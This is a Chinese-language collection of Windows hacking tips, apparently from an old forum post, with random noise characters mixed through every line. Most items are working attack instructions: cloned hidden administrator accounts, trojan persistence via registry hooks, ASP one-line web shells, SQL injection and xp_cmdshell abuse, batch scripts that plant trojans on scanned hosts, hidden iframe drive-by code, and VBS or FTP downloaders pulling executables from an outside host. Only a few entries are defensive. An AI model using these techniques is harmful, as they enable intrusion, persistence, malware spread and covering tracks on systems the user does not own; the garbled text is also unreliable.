Xp系统修改权限防止病毒或木马等破坏系统,cmd下,
3 ?. @$ l- ]. L; k% Ycacls C:\windows\system32 /G hqw20:R: X. L3 g( W1 q8 @5 b3 C, i
思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入
7 T7 @9 O) W) `/ R+ _" R$ S0 v. T恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F
- F! H$ K* j6 N( e9 D, p! W' l
J& A Y/ ]8 @9 L; U2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。
+ T9 D) W" Y! n' ?8 i: n N( w$ H2 T
3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。
) I. a7 H; H2 M9 ?! y6 q) u0 {6 e, Y/ D3 p% X5 k7 G: J0 H8 y
4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号$ j' @3 p8 ~ G. v. d
F( [. Z3 K) f. c0 F5、利用INF文件来修改注册表
' t" o3 D4 h/ H: Y5 X4 S! `[Version]
! T# z* X/ `6 o, l, @ [Signature="$CHICAGO$"6 i. B" P- H! e7 _ x8 V
[Defaultinstall]
# h( T$ X0 E6 }# m. v" q% TaddREG=Ating
1 y: N- d2 r! K[Ating]* E8 l' X" O0 `! W, Y. H! F
HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"
! i; T" K. @( h& G# {+ t3 {3 E以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:
- k; }6 }" X/ y. ]rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径
& ?5 V" F+ f, m7 z4 H* S其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU
/ W6 R/ L( K) h# v+ {HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU5 i* i* a( t# ~1 N! I& j& U4 _
HKEY_CURRENT_CONFIG 简写为 HKCC
* g/ d& L" X1 S% w' ^0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值
0 l" l0 x1 b8 f! u# E"1"这里代表是写入或删除注册表键值中的具体数据
: J# g2 K0 l+ e! c, R. N/ K' f" r% o* c( h' s2 r
6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,
7 r# T% Y6 A' F. n多了一步就是在防火墙里添加个端口,然后导出其键值2 b O, s X- D+ I+ t
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
) [9 G. O' D8 e
1 c2 m. S/ l6 ]7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽. k" i. a' |" s3 S
在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。" R0 E V' |5 g! t0 V
" {$ W, c+ U& p, h9 v+ U8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。
. h+ ?; U$ }4 O7 P; l
" W% V' G' Q1 y9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,) z$ V( D, s6 s" s9 t5 n3 ~1 u
可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。
6 ]& @1 I5 ^7 z5 u# V2 I, a* B9 w
v* a$ l5 p# \10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”
, d6 l" K# ^: t( Y4 `/ l; L! B9 E9 E" l
11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,
, k+ c9 G: r# n( [9 Q) D用法:xsniff –pass –hide –log pass.txt D3 d6 Y! U5 L4 I5 L
) J) G0 W4 a- r# ?12、google搜索的艺术0 e, E) n8 |+ n) G1 g4 J' e
搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”0 B- w& `) p! s, ~' z
或“字符串的语法错误”可以找到很多sql注入漏洞。
$ K6 Q% p+ B% v+ T- L9 |
% {* V4 S- f. z @: E& o# x13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。' f: p- h/ f5 {; c/ w* R
o* @" Z: x$ k% [
14、cmd中输入 nc –vv –l –p 1987
: ?5 n8 T: `1 ?做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃
6 t8 l8 g6 O9 M7 c1 G3 g- o0 q2 o
- w4 I- U$ Y' a7 n& J0 P15、制作T++木马,先写个ating.hta文件,内容为
/ Z( {# l3 x L" w D9 N<script language="VBScript">
, u$ W3 C4 h* W9 Sset wshshell=createobject ("wscript.shell" )
Y7 K1 E0 G" s( q9 r7 ~2 Ma=wshshell.run("你马的名称",1); Z9 p3 w1 |* Q
window.close
. u; [+ f, l1 e</script>
6 a, W, i% u! x: K再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。
4 _* f6 E2 D8 r+ B7 M e3 N5 @2 f' i; m4 e8 T+ }0 @! [( Y5 B
16、搜索栏里输入% i L/ v" j) f: x
关键字%'and 1=1 and '%'='- I' w) S# F8 m [% D
关键字%'and 1=2 and '%'='6 O, A; @0 i6 s% l8 r6 O
比较不同处 可以作为注入的特征字符
. v: P: f# I3 ~- T! C+ `3 Z0 t4 t8 I1 @9 b0 Q1 x$ k4 H
17、挂马代码<html>
& E0 E% A+ S. x- F! O/ F<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>
' Y7 H+ b: X- s; J</html>. o" ]5 g" \# Q; E5 o% N4 y$ i8 Z
. f& w; g+ c8 u" w18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,
: P) o) `! l( n* V6 Q/ m9 Dnet localgroup administrators还是可以看出Guest是管理员来。
, v) P8 h; \1 H" q7 X- Z0 @
: o, X8 n; e0 R& U19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等
+ @5 S; e, f; L0 Q' X2 P+ S用法: 安装: instsrv.exe 服务名称 路径! _ K" G" L% |/ ]4 f/ a8 y7 ~5 D. }1 C) E% H
卸载: instsrv.exe 服务名称 REMOVE
: ~0 O, B+ a* R) z! M+ }7 O- ?- f1 A" E, C. A' \6 A
0 P6 J) r' r4 @2 F
21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉
7 K' m4 B% z# |% h1 ~/ b不能注入时要第一时间想到%5c暴库。
( H6 g% N. W" H3 m" |* s% a/ q7 k5 V H( L
22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~
4 s6 N$ a( L" H7 J4 U( |9 p3 n: G
. C# ]7 g# i6 |5 ?8 ^3 R23、缺少xp_cmdshell时' E& H: L8 B1 L! ` N. F- y
尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'1 B+ L8 m; A9 J9 b+ I9 x5 _
假如恢复不成功,可以尝试直接加用户(针对开3389的)
/ g7 F$ Y( j: i# U6 V; F. kdeclare @o int: E5 M6 m- _& h6 o: [) c5 z
exec sp_oacreate 'wscript.shell',@o out
$ P. N5 I& ]$ o8 Hexec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员3 L9 e8 E" i7 |/ E
$ ?5 E4 O2 n5 A! D R3 d
24.批量种植木马.bat4 `# M, h* K- m) \ Z
for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中* D/ i" v* _2 _
for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间- ]9 u/ f Z# ~. y2 G9 @: l( ^9 J0 C
扫描地址.txt里每个主机名一行 用\\开头
& t8 ]: @' q! ?& B# d5 a: m4 t/ ]
5 F% A) C; c9 n8 z2 L6 ^25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。1 u( g5 ]" q5 D1 k6 K
8 I2 h# m3 D8 e' [9 Z
26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.
3 b7 j- P9 W- z! Y, H \将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.7 W; ]& H# z6 T& q! y& G
.cer 等后缀的文件夹下都可以运行任何后缀的asp木马% {) \0 ?1 R( B# Z9 r1 ?
# g' \. j" |: _' W
27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP9 Y8 V1 G2 t* _9 X% \
然后用#clear logg和#clear line vty *删除日志- @! o8 o5 T5 `: M0 G; d
4 q' M, w, `$ {8 l0 D
28、电脑坏了省去重新安装系统的方法
- [$ l/ G, F; b6 W3 ?9 |纯dos下执行,
' ]' O4 ]9 _6 \8 d( r8 z0 o" lxp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config
2 c5 X! k4 o* z& ?: P: A2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config+ H1 S1 t- T! v1 H2 r
2 s( Q( K# l3 v; B29、解决TCP/IP筛选 在注册表里有三处,分别是:
; t8 ?: U- @# t; m" I s! Q D! EHKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip+ F" V6 o7 s7 Y d: D) c, u
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip! I0 q- U( m& e
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip( l5 {& s) n" k. [: J/ V* C0 p2 {6 j
分别用
2 y8 C4 ]6 A5 P1 m$ V3 _( y. r Gregedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip; Q0 a" h9 v+ k5 T
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip- ]! B+ i9 z" `' o* u& ]; o3 I9 }
regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip8 {2 g4 n2 t5 f
命令来导出注册表项$ n# Z( p. ~" b0 r M
然后把三个文件里的EnableSecurityFilters"=dword:00000001,) \4 C& w4 Y- T8 {3 j: j/ D4 I
改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用
5 R( c) W* ]) {- V/ P1 k$ u& Vregedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。, S! H- X' C: j4 S U6 C
2 Q, r1 ~ R# k$ V
30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U
$ o/ T" D5 M4 r: y) G4 cSER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3; b/ T- G, {: D' N' h
D2 q' _ A L' {5 k; }31、全手工打造开3389工具
6 G6 B% u) z: q9 \; V打开记事本,编辑内容如下:
' I4 m1 |: _( j0 _echo [Components] > c:\sql
6 h' ~ g" C6 @! i; hecho TSEnable = on >> c:\sql& [: n; N/ ~& F1 O* T6 @& e
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q5 h( F, a6 r9 c2 k& ]- X
编辑好后存为BAT文件,上传至肉鸡,执行
; S1 W) M$ d5 u8 S7 c: K4 G& \- f
6 D0 A9 x7 I: O R$ L32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马5 @3 f9 `0 w) e6 s1 M
3 T$ X* |, U1 [: h! ?- Z; M% @; ?9 x
33、让服务器重启& R0 u" {+ P4 {& ?, c! H+ R& t
写个bat死循环:
) w! `9 l3 d- t. w1 F- D@echo off% a. i s; p2 M f: U
:loop1$ l9 U t6 P$ H1 @
cls% J) m6 H& D3 P
start cmd.exe3 [3 e! U S8 D
goto loop1
; K3 H5 `' {0 u% O u保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启6 P7 Y$ l) q1 D0 B
7 y. l$ j! u& F, ^* e$ n/ K" E34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,
; H5 V9 s# U1 N J) O+ J; [4 g$ _1 Z@echo off
0 z( X. L; {! k5 c# a. t. Sdate /t >c:/3389.txt: K& O# N; {8 Z7 x& v& \
time /t >>c:/3389.txt
* }" Q7 m6 E! g" Jattrib +s +h c:/3389.bat
8 {. U" f7 F2 \, Vattrib +s +h c:/3389.txt
6 W+ b/ I$ w a4 K$ B% Onetstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt
0 X3 ^! Y- U/ e( O, G! u并保存为3389.bat3 P/ V1 M. `" d) M7 S
打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号2 I" X# d' w( ^! E1 _6 F+ V; H Z
# C+ a5 V% @8 N: X' y
35、有时候提不了权限的话,试试这个命令,在命令行里输入:
9 C( [3 i# z' f8 g9 a) ~4 D& ?start http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)
) v' m& l: _- }& P x输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。
4 d/ c# ~' C. I( G
7 @+ ~6 Y' |* M+ k36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件
* Q; v; k, V) M$ {) g% e# oecho open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址
* s7 L2 m9 q/ A1 L( `3 _- v, Techo 你的FTP账号 >>c:\1.bat //输入账号
$ ]$ }% E3 ]; X }- Wecho 你的FTP密码 >>c:\1.bat //输入密码
, G. W) m' t# h' f* iecho bin >>c:\1.bat //登入9 I6 L1 O8 ^& Q& J0 Q) b' a0 C9 D
echo get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么* D# j6 k6 v0 d& J9 b& b5 D7 K4 v
echo bye >>c:\1.bat //退出/ T, c2 N7 m! w$ o* S
然后执行ftp -s:c:\1.bat即可* ?* h7 F$ S6 i. G" C5 ^1 }
1 V/ p. L5 O( ]3 S37、修改注册表开3389两法
$ H% d5 B2 e7 `2 I" G(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表
8 [# M. H& S7 B( f& E# O3 |echo Windows Registry Editor Version 5.00 >>3389.reg
3 {. R. j3 K7 L2 n5 W }echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
+ p* Q+ Q& z0 m+ mecho "Enabled"="0" >>3389.reg7 Q& S6 c7 M7 T% e- M" s% D
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
, B( l9 R ~2 J/ I1 R9 eNT\CurrentVersion\Winlogon] >>3389.reg
$ M# }$ W: M/ B3 t7 E/ Lecho "ShutdownWithoutLogon"="0" >>3389.reg
1 y2 I5 B! c; Qecho [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
) G; J. S! \. C4 u! e: W) T>>3389.reg _9 B) s o. W( H; r
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg8 c" w5 y! d) m0 T! R
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
: i1 X0 z) B, P9 N) f>>3389.reg
7 t; E( i! M: ~' l2 V0 M; @5 U3 Wecho "TSEnabled"=dword:00000001 >>3389.reg
0 a+ E0 D8 P+ ~$ C& H/ E5 K0 vecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg I1 ?- ~8 t) h- s9 B3 z
echo "Start"=dword:00000002 >>3389.reg( g; C! A7 M4 c. s4 k' ]8 E+ F0 m
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
5 v* |, z: v7 P6 |( p8 g/ |* u>>3389.reg
4 M* Y! B) l. i% u9 Y) wecho "Start"=dword:00000002 >>3389.reg, M& |2 @% |$ n# q& R2 R
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg! o; }0 [0 f9 D7 X$ s g
echo "Hotkey"="1" >>3389.reg
0 I, M+ _$ s2 M3 K3 Eecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
7 X4 S% W. U) l& o# KServer\Wds\rdpwd\Tds\tcp] >>3389.reg) Q; P& }8 n/ l4 t
echo "PortNumber"=dword:00000D3D >>3389.reg! p$ y- N. X4 v/ v& T) h. e
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal# [; o& U% Z6 R* y9 W7 N
Server\WinStations\RDP-Tcp] >>3389.reg% x$ ?" v7 H( N" K0 S
echo "PortNumber"=dword:00000D3D >>3389.reg
# V4 U$ Q4 @; L+ Z9 V9 v9 h把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。3 I0 M0 T* _( g5 {6 g
(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
: r( m- F, Z+ \因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效
z3 M. [ q) H* M r# X(2)winxp和win2003终端开启
9 O! p) u0 n! P- W4 `5 s$ c( I用以下ECHO代码写一个REG文件:
' @6 Q. u0 \$ V8 V' \5 F! }4 @( Zecho Windows Registry Editor Version 5.00>>3389.reg# |! h/ C2 t ^1 i
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
6 s2 ?' Z8 s$ K' WServer]>>3389.reg4 f* f3 G3 I$ A+ o; l
echo "fDenyTSConnections"=dword:00000000>>3389.reg
/ A, r- t$ b1 }6 T2 V( Y. uecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal( r9 T& c2 g- o& S5 U5 y8 K9 a# H, S* \
Server\Wds\rdpwd\Tds\tcp]>>3389.reg
" T. V) x1 b, `4 H$ m2 wecho "PortNumber"=dword:00000d3d>>3389.reg
: E% G7 w7 d" @# recho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
, q7 l7 @; A, J" yServer\WinStations\RDP-Tcp]>>3389.reg& G4 @8 n0 ^. {* z
echo "PortNumber"=dword:00000d3d>>3389.reg2 G7 A* D/ Z! V
然后regedit /s 3389.reg del 3389.reg8 N% k8 ~* X( o1 x
XP下不论开终端还是改终端端口都不需重启
* C: o# s4 g% G; ?6 B2 l% q0 v2 `7 S( N* v* e6 }' Z
38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃# T S2 N9 w8 H/ s) L
用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'' j, I4 P! [4 d% i
8 | s/ d5 `6 ~$ J$ u% J39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!& V8 w' W! Q0 [" ^+ u
(1)数据库文件名应复杂并要有特殊字符
7 K+ f, @' V9 {! X5 W( d(2)不要把数据库名称写在conn.asp里,要用ODBC数据源: d0 Q1 F7 r/ d5 L% {
将conn.asp文档中的& G. @4 K+ W& [8 E E4 F5 D c
DBPath = Server.MapPath("数据库.mdb")9 c2 \6 i0 ?& ?" R q/ G$ M
conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath& H: W5 ~& l( j5 Y
( ?4 x$ X- L T. b/ g修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置' T$ H- O$ h4 h6 O
(3)不放在WEB目录里; ]/ U" i( A# a' R
. Z$ K7 l, Q! }7 z2 B40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉8 h9 m# g4 z: B4 n
可以写两个bat文件3 U" e- g9 H# P& q
@echo off( j6 @) N& h$ M5 Y/ d& U" C
@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe
# o) b% k, R& r" I@del c:\winnt\system32\query.exe8 i5 J) s+ V9 p+ _& c
@del %SYSTEMROOT%\system32\dllcache\query.exe p8 k( z0 |- N9 O8 Y
@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的
: D4 h- _" x8 J& w" W2 _, g. ]" {; \; o6 A( K& _
@echo off! g8 {: |9 B& e4 l- i, J' m
@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe
7 C6 G' J7 b8 K" f" s+ x@del c:\winnt\system32\tsadmin.exe0 x6 Q! h" i- \
@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex/ o9 `) R t$ T5 {- C* g R
6 m' |8 r) Y7 F
41、映射对方盘符* y5 n( u+ T7 B2 J/ E
telnet到他的机器上,
. O. G" w2 C; A+ ^7 wnet share 查看有没有默认共享 如果没有,那么就接着运行
3 ^- @3 p! n0 o) I$ \! E+ z. j( r @net share c$=c:
+ D% t6 I6 w7 n7 @1 f" Gnet share现在有c$
; r7 H" |6 m2 b, o4 v' G, L在自己的机器上运行. h0 E; S/ K7 K5 t3 C' J0 ~
net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K
% Q8 X+ Q. ~8 {$ p* z8 c8 o: K
$ b2 I8 d4 U% w$ i) Y U8 L! _42、一些很有用的老知识
5 {$ ~0 w) n1 b9 a+ T, f& `$ Ktype c:\boot.ini ( 查看系统版本 )
) V) P# \; p0 O8 ]net start (查看已经启动的服务)/ o/ ]. K- p, z4 ?% G: n
query user ( 查看当前终端连接 )+ o$ u( p5 k4 C; K0 c4 v
net user ( 查看当前用户 )* U5 b6 P1 u% m8 j3 V) y
net user 用户 密码/add ( 建立账号 )
7 F: b" K+ I* o! F% X% nnet localgroup administrators 用户 /add (提升某用户为管理员)
% u* G% V0 ~, V4 }+ Sipconfig -all ( 查看IP什么的 )
8 H; }) P0 p B( Inetstat -an ( 查看当前网络状态 )1 r* V3 O/ g# Y$ t, ~, V$ O
findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)
. |8 l9 V3 z+ k) J e" S; {克隆时Administrator对应1F4- R& ?: |5 A5 N2 f3 B* Z) l
guest对应1F5# u: k3 Z& m( x- X
tsinternetuser对应3E8( Q0 U/ @+ d. x* e& ?& N# h
2 j7 s$ {0 `, e" [$ }6 b
43、如果对方没开3389,但是装了Remote Administrator Service
4 |. ]. i, [, C+ }8 f# U7 O/ a L用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接/ l, W! Q+ _6 ]7 B
解释:用serv-u漏洞导入自己配制好的radmin的注册表信息7 U2 D# k5 N \9 N- h9 J3 a
先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"
% S9 ^) b& F8 m. P( x, p. k* d
1 W$ x* m: n5 Z- r2 R, Y44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)9 Y/ G7 y% P6 x6 E& m
本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)
* Q6 o0 D6 P4 G6 o1 c# W9 P4 E" z8 ?& z3 H$ K, Z) I
45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)
& H- F% \' Z5 f1 M; ~& M% I' W% iecho Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open
4 A4 s! W* f4 V^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =
+ z1 ]" v; ~9 `9 e9 PCreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =
2 l$ c2 N3 H- u! p% v X! I' J1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs
) H! x4 `3 r, b/ V m(这是完整的一句话,其中没有换行符) [$ O; N1 H. m9 Y
然后下载:% B9 T5 x; @/ V* d$ Y& V
cscript down.vbs http://www.hack520.org/hack.exe hack.exe
* P- W- t/ Z. C4 I6 e6 P0 u
2 Z7 D" k% z* k6 W9 d( E7 w/ Y46、一句话木马成功依赖于两个条件:! y% R q0 \9 m
1、服务端没有禁止adodb.Stream或FSO组件
( S; D( }7 [3 ?9 P0 N1 L2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。
8 Y$ t% h2 I1 S9 M- I/ _+ V; Y. m/ ^. k4 [" o! b# _
47、利用DB_OWNER权限进行手工备份一句话木马的代码:
. X; X- B3 i2 j9 F;alter database utsz set RECOVERY FULL--
. h8 |' x. S& X- p$ b5 n+ M: [" o;create table cmd (a image)--
3 X" j) `: I6 I;backup log utsz to disk = 'D:\cmd' with init--
4 t8 w# {( v$ A5 u! h5 h9 I; w;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--
7 W U& Q& |" `" l;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--& T: I( a& a( a* W) L* u
注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。
2 Q) y% s1 I% s% [. a& ^. P) Y: l8 H: y% I$ Q; k; T9 Z
48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:1 O5 o6 x, W# C9 z- i2 T
) S7 [3 J. N% a
用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options
( Q' s4 I. d" o; ]所有会话用 'all'。
; K5 }! b1 g- j. X x* x-s sessionid 列出会话的信息。" Z5 \! q+ d$ l* Y4 Y& Y
-k sessionid 终止会话。5 \: G# D( T8 j4 S" L$ b
-m sessionid 发送消息到会话。/ F, u! ~2 @6 b, [' t9 h
# A% h( D Q- R* \2 Qconfig 配置 telnet 服务器参数。) r1 b1 w8 |0 U' g* |/ \
y! ? m/ ?8 p) D8 V; ]! D- kcommon_options 为:6 H5 x# g6 ~! i( \1 J
-u user 指定要使用其凭据的用户
% s: D5 g+ W( ?6 C-p password 用户密码" ?; V2 A9 L$ K/ d
6 k/ k( }9 y, E9 n% a
config_options 为:2 U# F0 v) ~1 t
dom = domain 设定用户的默认域
- b2 t3 D5 s% g4 {ctrlakeymap = yes|no 设定 ALT 键的映射
; ~* Q# `: D% p+ u: I/ N% {timeout = hh:mm:ss 设定空闲会话超时值
9 ]: {5 v0 _! F- q, `9 Etimeoutactive = yes|no 启用空闲会话。
( {. |& M- F* c. i+ tmaxfail = attempts 设定断开前失败的登录企图数。( x5 C3 c& }: v" D, Q# ?# t- R
maxconn = connections 设定最大连接数。
* P) L4 N( W. P8 I9 _5 \port = number 设定 telnet 端口。
, `6 I; i3 Y4 |+ f" Hsec = [+/-]NTLM [+/-]passwd6 S4 _! |" Y! Y) Y+ t
设定身份验证机构! l& X/ k: `& W. g. z
fname = file 指定审计文件名。" z+ e" Q1 ] g+ B
fsize = size 指定审计文件的最大尺寸(MB)。1 ?2 O- J. I9 R
mode = console|stream 指定操作模式。
2 J* k* T7 ]. f$ yauditlocation = eventlog|file|both# V8 W) V$ O/ o5 `' ^) Z+ L
指定记录地点
8 W/ G. n9 f3 H: J) @4 w; U+ naudit = [+/-]user [+/-]fail [+/-]admin
( G2 E; N h. b5 G6 z) w
8 k& t; t/ ~ q+ q49、例如:在IE上访问:
' n4 O/ B& m6 P; b' n% Awww.hack520.org/hack.txt就会跳转到http://www.hack520.org/
: u* w! E' @5 W8 d- h1 jhack.txt里面的代码是:+ L q+ q* Y1 k- I0 w1 N
<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">6 D) u+ n; b' w' }& ~
把这个hack.txt发到你空间就可以了!! B( u5 v) c J/ G
这个可以利用来做网马哦!
3 \% j# l' I& o, Q# Q; l
0 D3 l' [+ c! C50、autorun的病毒可以通过手动限制!
3 S. x' V M# X8 I1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!
5 ^4 U. A- z, J0 u6 T6 a2,打开盘符用右键打开!切忌双击盘符~$ D0 i. R: u! M* M. L. T) C
3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!
4 j0 z& e1 T9 H: @. a- b. D0 j
7 A* k7 Z9 k) G" M51、log备份时的一句话木马: k7 s; X+ a: ]# p3 C5 w3 A& p+ K
a).<%%25Execute(request("go"))%%25>) t3 L S* T1 f6 @% H
b).<%Execute(request("go"))%>2 p0 a9 G0 o% I8 A
c).%><%execute request("go")%><%
B9 E/ m- A: w! ?1 J1 }d).<script language=VBScript runat=server>execute request("sb")</Script>
d, |- v7 Y3 p8 g! ke).<%25Execute(request("l"))%25>
" u9 i$ f# a% A* k9 ~" C5 Sf).<%if request("cmd")<>"" then execute request("pass")%>. V. K2 Z# t8 a- e3 A
8 n7 j( H6 _8 @+ X7 X
52、at "12:17" /interactive cmd
& f! v t4 L+ |1 O# Z3 q2 h( o执行后可以用AT命令查看新加的任务
